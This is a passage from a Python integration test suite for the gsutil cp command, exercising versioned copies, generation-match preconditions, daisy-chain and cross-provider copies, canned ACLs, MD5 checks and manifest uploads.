size2, _, uri_str2, _ = listing2[1].split()
self.assertEquals(size2, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
_Check2()
# Recursively copy to second versioned bucket with no -A flag.
# This should copy only the live object.
self.RunGsUtil(['cp', '-R', suri(bucket1_uri, '*'), suri(bucket3_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket3_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
# 1 line of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing2), 3)
# Live (second) object in bucket 1 should match the single live object.
size1, _, uri_str1, _ = listing2[0].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
_Check3()
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_generation_zero_match(self):
"""Tests that cp handles an object-not-exists precondition header."""
bucket_uri = self.CreateBucket()
fpath1 = self.CreateTempFile(contents=b'data1')
# Match 0 means only write the object if it doesn't already exist.
gen_match_header = 'x-goog-if-generation-match:0'
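# Illustrative command-line equivalent (bucket name hypothetical):
#   gsutil -h "x-goog-if-generation-match:0" cp data1.txt gs://my-bucket/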
# First copy should succeed.
# TODO: This can fail (rarely) if the server returns a 5xx but actually
# commits the bytes. If we add restarts on small uploads, handle this
# case.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(bucket_uri)])
# Second copy should fail with a precondition error.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_v_generation_match(self):
"""Tests that cp -v option handles the if-generation-match header."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = k1_uri.generation
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
gen_match_header = 'x-goog-if-generation-match:%s' % g1
# First copy should succeed.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(k1_uri)])
# Second copy should fail the precondition.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
# Specifying a generation with -n should fail before the request hits the
# server.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', '-n', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn(
'Specifying x-goog-if-generation-match is not supported '
'with cp -n', stderr)
@SequentialAndParallelTransfer
def test_cp_nv(self):
"""Tests that cp -nv works when skipping existing file."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
# First copy should succeed.
self.RunGsUtil(['cp', '-nv', fpath1, suri(k1_uri)])
# Second copy should skip copying.
stderr = self.RunGsUtil(
['cp', '-nv', fpath1, suri(k1_uri)], return_stderr=True)
self.assertIn('Skipping existing item:', stderr)
@SequentialAndParallelTransfer
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_cp_v_option(self):
""""Tests that cp -v returns the created object's version-specific URI."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
# Case 1: Upload file to object using one-shot PUT.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 2: Upload file to object using resumable upload.
size_threshold = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(size_threshold))
with SetBotoConfigForTest([boto_config_for_test]):
file_as_string = os.urandom(size_threshold)
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=file_as_string)
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 3: Upload stream to object.
self._run_cp_minus_v_test('-v', '-', k2_uri.uri)
# Case 4: Download object to file. For this case we just expect output of
# gsutil cp -v to be the URI of the file.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir)
dst_uri = storage_uri(fpath1)
stderr = self.RunGsUtil(
['cp', '-v', suri(k1_uri), suri(dst_uri)], return_stderr=True)
# TODO: Add ordering assertion (should be in stderr.split('\n')[-2]) back
# once both the creation and status messages are handled by the UI thread.
self.assertIn('Created: %s\n' % dst_uri.uri, stderr)
# Case 5: Daisy-chain from object to object.
self._run_cp_minus_v_test('-Dv', k1_uri.uri, k2_uri.uri)
# Case 6: Copy object to object in-the-cloud.
self._run_cp_minus_v_test('-v', k1_uri.uri, k2_uri.uri)
def _run_cp_minus_v_test(self, opt, src_str, dst_str):
"""Runs cp -v with the options and validates the results."""
stderr = self.RunGsUtil(['cp', opt, src_str, dst_str], return_stderr=True)
match = re.search(r'Created: (.*)\n', stderr)
self.assertIsNotNone(match)
created_uri = match.group(1)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-a', dst_str], return_stdout=True)
lines = stdout.split('\n')
# Final (most recent) object should match the "Created:" URI. This is
# in second-to-last line (last line is '\n').
self.assertGreater(len(lines), 2)
self.assertEqual(created_uri, lines[-2])
_Check1()
@SequentialAndParallelTransfer
def test_stdin_args(self):
"""Tests cp with the -I option."""
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
fpath2 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '-I', suri(bucket_uri)],
stdin='\n'.join((fpath1, fpath2)))
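# Illustrative shell equivalent (paths hypothetical):
#   printf '%s\n' /tmp/data1 /tmp/data2 | gsutil cp -I gs://my-bucket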
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath1), stdout)
self.assertIn(os.path.basename(fpath2), stdout)
self.assertNumLines(stdout, 2)
_Check1()
def test_cross_storage_class_cloud_cp(self):
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Server now allows copy-in-the-cloud across storage classes.
self.RunGsUtil(['cp', suri(key_uri), suri(bucket2_uri)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_cross_provider_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket, contents=b'foo')
gs_key = self.CreateObject(bucket_uri=gs_bucket, contents=b'bar')
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
@unittest.skip('This test performs a large copy but remains here for '
'debugging purposes.')
def test_cross_provider_large_cp(self):
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket,
contents=b'f' * 1024 * 1024)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * 1024 * 1024)
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))]):
# Ensure copy also works across json upload chunk boundaries.
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_gs_to_s3_multipart_cp(self):
"""Ensure daisy_chain works for an object that is downloaded in 2 parts."""
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs', prefer_json_api=True)
num_bytes = int(_DEFAULT_DOWNLOAD_CHUNK_SIZE * 1.1)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * num_bytes,
prefer_json_api=True)
self.RunGsUtil([
'-o', 's3:use-sigv4=True', '-o', 's3:host=s3.amazonaws.com', 'cp',
suri(gs_key),
suri(s3_bucket)
])
@unittest.skip('This test is slow due to creating many objects, '
'but remains here for debugging purposes.')
def test_daisy_chain_cp_file_sizes(self):
"""Ensure daisy chain cp works with a wide of file sizes."""
bucket_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
exponent_cap = 28 # Object sizes up to 2**27 + 1 bytes (~128 MiB).
for i in range(exponent_cap):
one_byte_smaller = 2**i - 1
normal = 2**i
one_byte_larger = 2**i + 1
self.CreateObject(bucket_uri=bucket_uri, contents=b'a' * one_byte_smaller)
self.CreateObject(bucket_uri=bucket_uri, contents=b'b' * normal)
self.CreateObject(bucket_uri=bucket_uri, contents=b'c' * one_byte_larger)
self.AssertNObjectsInBucket(bucket_uri, exponent_cap * 3)
self.RunGsUtil(
['-m', 'cp', '-D',
suri(bucket_uri, '**'),
suri(bucket2_uri)])
self.AssertNObjectsInBucket(bucket2_uri, exponent_cap * 3)
def test_daisy_chain_cp(self):
"""Tests cp with the -D option."""
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set some headers on source object so we can verify that headers are
# preserved by daisy-chain copy.
self.RunGsUtil([
'setmeta', '-h', 'Cache-Control:public,max-age=12', '-h',
'Content-Type:image/gif', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta,
suri(key_uri)
])
# Set public-read (non-default) ACL so we can verify that cp -D -p works.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
acl_json = self.RunGsUtil(['acl', 'get', suri(key_uri)], return_stdout=True)
# Perform daisy-chain copy and verify that source object headers and ACL
# were preserved. Also specify -n option to test that gsutil correctly
# removes the x-goog-if-generation-match:0 header that was set at uploading
# time when updating the ACL.
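# For context: -D (daisy chain) routes the copy through the machine running
# gsutil (download then re-upload) rather than a copy-in-the-cloud, and -p
# preserves the source object's ACL on the destination.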
stderr = self.RunGsUtil(
['cp', '-Dpn', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertNotIn('Copy-in-the-cloud disallowed', stderr)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
stdout = self.RunGsUtil(['ls', '-L', uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control:\s+public,max-age=12')
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertRegex(stdout, r'Metadata:\s+1:\s+abcd')
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(acl_json, new_acl_json)
_Check()
@unittest.skipUnless(
not HAS_GS_PORT, 'gs_port is defined in config which can cause '
'problems when uploading and downloading to the same local host port')
def test_daisy_chain_cp_download_failure(self):
"""Tests cp with the -D option when the download thread dies."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri,
contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
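# --testcallbackfile points gsutil at a pickled callback handler (here a
# HaltingCopyCallbackHandler) that gets invoked with progress updates during
# the transfer, letting the test inject a failure partway through the
# download.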
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, '-D',
suri(key_uri),
suri(bucket2_uri)
],
expected_status=1,
return_stderr=True)
# Should have three exception traces; one from the download thread and
# two from the upload thread (exception message is repeated in main's
# _OutputAndExit).
self.assertEqual(
stderr.count(
'ResumableDownloadException: Artifically halting download'), 3)
def test_streaming_gzip_upload(self):
"""Tests error when compression flag is requested on a streaming source."""
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-Z', '-', suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1,
stdin='streaming data')
self.assertIn(
'gzip compression is not currently supported on streaming uploads',
stderr)
def test_seek_ahead_upload_cp(self):
"""Tests that the seek-ahead iterator estimates total upload work."""
tmpdir = self.CreateTempDir(test_files=3)
bucket_uri = self.CreateBucket()
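# Boto config notes (as exercised by the assertions below):
# task_estimation_threshold is the task count above which the seek-ahead
# iterator reports an estimate (0 disables it), and task_estimation_force
# makes the estimate print even for short-lived commands so it can be
# asserted on.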
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_seek_ahead_download_cp(self):
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=3)
self.AssertNObjectsInBucket(bucket_uri, 3)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', suri(bucket_uri), tmpdir], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_canned_acl_cp(self):
"""Tests copying with a canned ACL."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
self.RunGsUtil(
['cp', '-a', 'public-read',
suri(key_uri),
suri(bucket2_uri)])
# Set public-read on the original key after the copy so we can compare
# the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
_Check()
@SequentialAndParallelTransfer
def test_canned_acl_upload(self):
"""Tests uploading a file with a canned ACL."""
bucket1_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set public-read on the object so we can compare the ACLs.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
public_read_acl = self.RunGsUtil(['acl', 'get', suri(key_uri)],
return_stdout=True)
file_name = 'bar'
fpath = self.CreateTempFile(file_name=file_name, contents=b'foo')
self.RunGsUtil(['cp', '-a', 'public-read', fpath, suri(bucket1_uri)])
new_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, file_name)], return_stdout=True)
self.assertEqual(public_read_acl, new_acl_json)
resumable_size = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(resumable_size))
with SetBotoConfigForTest([boto_config_for_test]):
resumable_file_name = 'resumable_bar'
resumable_contents = os.urandom(resumable_size)
resumable_fpath = self.CreateTempFile(file_name=resumable_file_name,
contents=resumable_contents)
self.RunGsUtil(
['cp', '-a', 'public-read', resumable_fpath,
suri(bucket1_uri)])
new_resumable_acl_json = self.RunGsUtil(
['acl', 'get', suri(bucket1_uri, resumable_file_name)],
return_stdout=True)
self.assertEqual(public_read_acl, new_resumable_acl_json)
def test_cp_key_to_local_stream(self):
bucket_uri = self.CreateBucket()
contents = b'foo'
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=contents)
stdout = self.RunGsUtil(['cp', suri(key_uri), '-'], return_stdout=True)
self.assertIn(contents, stdout.encode('ascii'))
def test_cp_local_file_to_local_stream(self):
contents = b'content'
fpath = self.CreateTempFile(contents=contents)
stdout = self.RunGsUtil(['cp', fpath, '-'], return_stdout=True)
self.assertIn(contents, stdout.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_zero_byte_file(self):
dst_bucket_uri = self.CreateBucket()
src_dir = self.CreateTempDir()
fpath = os.path.join(src_dir, 'zero_byte')
with open(fpath, 'w') as unused_out_file:
pass # Write a zero byte file
self.RunGsUtil(['cp', fpath, suri(dst_bucket_uri)])
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(dst_bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath), stdout)
_Check1()
download_path = os.path.join(src_dir, 'zero_byte_download')
self.RunGsUtil(['cp', suri(dst_bucket_uri, 'zero_byte'), download_path])
self.assertTrue(os.stat(download_path))
def test_copy_bucket_to_bucket(self):
"""Tests recursively copying from bucket to bucket.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateVersionedBucket()
dst_bucket_uri = self.CreateVersionedBucket()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
_CopyAndCheck()
def test_copy_duplicate_nested_object_names_to_new_cloud_dir(self):
"""Tests copying from bucket to same bucket preserves file structure."""
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir1/file.txt',
contents=b'data')
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir2/file.txt',
contents=b'data')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(
['cp', '-R',
suri(bucket_uri) + '/*',
suri(bucket_uri) + '/dst'])
stdout = self.RunGsUtil(['ls', '-R', bucket_uri.uri], return_stdout=True)
self.assertIn(suri(bucket_uri) + '/dst/dir1/file.txt', stdout)
self.assertIn(suri(bucket_uri) + '/dst/dir2/file.txt', stdout)
_CopyAndCheck()
def test_copy_duplicate_nested_object_names_to_existing_cloud_dir(self):
"""Tests copying from bucket to same bucket preserves file structure."""
bucket_uri = self.CreateBucket()
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir1/file.txt',
contents=b'data')
self.CreateObject(bucket_uri=bucket_uri,
object_name='dir2/file.txt',
contents=b'data')
self.CreateObject(bucket_uri=bucket_uri,
object_name='dst/existing_file.txt',
contents=b'data')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(
['cp', '-R',
suri(bucket_uri) + '/*',
suri(bucket_uri) + '/dst'])
stdout = self.RunGsUtil(['ls', '-R', bucket_uri.uri], return_stdout=True)
self.assertIn(suri(bucket_uri) + '/dst/dir1/file.txt', stdout)
self.assertIn(suri(bucket_uri) + '/dst/dir2/file.txt', stdout)
self.assertIn(suri(bucket_uri) + '/dst/existing_file.txt', stdout)
_CopyAndCheck()
@SkipForGS('Only s3 V4 signatures error on location mismatches.')
def test_copy_bucket_to_bucket_with_location_redirect(self):
# cp uses a sender function that raises an exception on location mismatches,
# instead of returning a response. This integration test ensures retries
# from exceptions work correctly.
src_bucket_region = 'ap-east-1'
dest_bucket_region = 'us-east-2'
src_bucket_host = 's3.%s.amazonaws.com' % src_bucket_region
dest_bucket_host = 's3.%s.amazonaws.com' % dest_bucket_region
client_host = 's3.eu-west-1.amazonaws.com'
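# The client is pointed at a third region so that requests to both the source
# and destination buckets have to follow the location-redirect retry path
# under test.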
with SetBotoConfigForTest([('s3', 'host', src_bucket_host)]):
src_bucket_uri = self.CreateBucket(location=src_bucket_region)
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
with SetBotoConfigForTest([('s3', 'host', dest_bucket_host)]):
dst_bucket_uri = self.CreateBucket(location=dest_bucket_region)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), suri(dst_bucket_uri)])
stdout = self.RunGsUtil(['ls', '-R', dst_bucket_uri.uri],
return_stdout=True)
self.assertIn(
'%s%s/obj0\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
self.assertIn(
'%s%s/obj1\n' % (dst_bucket_uri, src_bucket_uri.bucket_name), stdout)
with SetBotoConfigForTest([('s3', 'host', client_host)]):
_CopyAndCheck()
def test_copy_bucket_to_dir(self):
"""Tests recursively copying from bucket to a directory.
This should produce identically named objects (and not, in particular,
destination objects named by the version-specific URI from source objects).
"""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_copy_object_to_dir_s3_v4(self):
"""Tests copying object from s3 to local dir with v4 signature.
Regions like us-east-2 accept only V4 signatures, so we create the
bucket in the us-east-2 region to enforce testing with the V4 signature.
"""
src_bucket_uri = self.CreateBucket(provider='s3', location='us-east-2')
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _CopyAndCheck():
"""Copies the bucket recursively and validates the results."""
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(
os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
_CopyAndCheck()
@SkipForS3('The boto lib used for S3 does not handle objects '
'starting with slashes if we use V4 signature')
def test_recursive_download_with_leftover_slash_only_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, '/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_recursive_download_with_leftover_dir_placeholder(self):
"""Tests that we correctly handle leftover dir placeholders."""
src_bucket_uri = self.CreateBucket()
dst_dir = self.CreateTempDir()
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj0',
contents=b'abc')
self.CreateObject(bucket_uri=src_bucket_uri,
object_name='obj1',
contents=b'def')
# Create a placeholder like what can be left over by web GUI tools.
key_uri = self.StorageUriCloneReplaceName(src_bucket_uri, 'foo/')
self.StorageUriSetContentsFromString(key_uri, '')
self.AssertNObjectsInBucket(src_bucket_uri, 3)
self.RunGsUtil(['cp', '-R', suri(src_bucket_uri), dst_dir])
dir_list = []
for dirname, _, filenames in os.walk(dst_dir):
for filename in filenames:
dir_list.append(os.path.join(dirname, filename))
dir_list = sorted(dir_list)
self.assertEqual(len(dir_list), 2)
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj0'),
dir_list[0])
self.assertEqual(os.path.join(dst_dir, src_bucket_uri.bucket_name, 'obj1'),
dir_list[1])
def test_copy_quiet(self):
bucket_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'foo')
stderr = self.RunGsUtil([
'-q', 'cp',
suri(key_uri),
suri(self.StorageUriCloneReplaceName(bucket_uri, 'o2'))
],
return_stderr=True)
self.assertEqual(stderr.count('Copying '), 0)
def test_cp_md5_match(self):
"""Tests that the uploaded object has the expected MD5.
Note that while this does perform a file-to-object upload, MD5s are
not supported for composite objects, so we don't use the decorator in this
case.
"""
bucket_uri = self.CreateBucket()
fpath = self.CreateTempFile(contents=b'bar')
with open(fpath, 'rb') as f_in:
md5 = binascii.unhexlify(CalculateMd5FromContents(f_in))
try:
encoded_bytes = base64.encodebytes(md5)
except AttributeError:
      # For Python 2 compatibility.
encoded_bytes = base64.encodestring(md5)
file_md5 = encoded_bytes.rstrip(b'\n')
self.RunGsUtil(['cp', fpath, suri(bucket_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', suri(bucket_uri)],
return_stdout=True)
self.assertRegex(
stdout, r'Hash\s+\(md5\):\s+%s' % re.escape(file_md5.decode('ascii')))
_Check1()
@unittest.skipIf(IS_WINDOWS,
'Unicode handling on Windows requires mods to site-packages')
@SequentialAndParallelTransfer
def test_cp_manifest_upload_unicode(self):
return self._ManifestUpload('foo-unicöde'.encode(UTF8),
'bar-unicöde'.encode(UTF8),
'manifest-unicöde'.encode(UTF8))
@SequentialAndParallelTransfer
def test_cp_manifest_upload(self):
"""Tests uploading with a mnifest file."""
return self._ManifestUpload('foo', 'bar', 'manifest')
def _ManifestUpload(self, file_name, object_name, manifest_name):
"""Tests uploading with a manifest file."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, object_name)
fpath = self.CreateTempFile(file_name=file_name, contents=b'bar')
logpath = self.CreateTempFile(file_name=manifest_name, contents=b'')
# Ensure the file is empty.
open(logpath, 'w').close()
self.RunGsUtil(['cp', '-L', logpath, fpath, dsturi])
with open(logpath, 'r') as f:
lines = f.readlines()
if six.PY2:
lines = [six.text_type(line, UTF8) for line in lines]
self.assertEqual(len(lines), 2)
expected_headers = [
'Source', 'Destination', 'Start', 'End', 'Md5', 'UploadId',
'Source Size', 'Bytes Transferred', 'Result', 'Description'
]
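    # For reference, a successful data row in the manifest looks roughly like
    # (values here are illustrative, not literal test output):
    #   file:///tmp/foo,gs://bucket/bar,2020-01-01T00:00:00.000000Z,
    #   2020-01-01T00:00:01.000000Z,rL0Y20zC+Fzt72VPzMSk2A==,,3,3,OK,
    # UploadId and Description are typically blank for a small, successful
    # upload like this one.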
self.assertEqual(expected_headers, lines[0].strip().split(','))
results = lines[1].strip().split(',')
results = dict(zip(expected_headers, results))
self.assertEqual(
results['Source'],
'file://' + fpath,
)
self.assertEqual(
results['Destination'],
dsturi,
)
date_format = '%Y-%m-%dT%H:%M:%S.%fZ'
start_date = datetime.datetime.strptime(results['Start'], date_format)
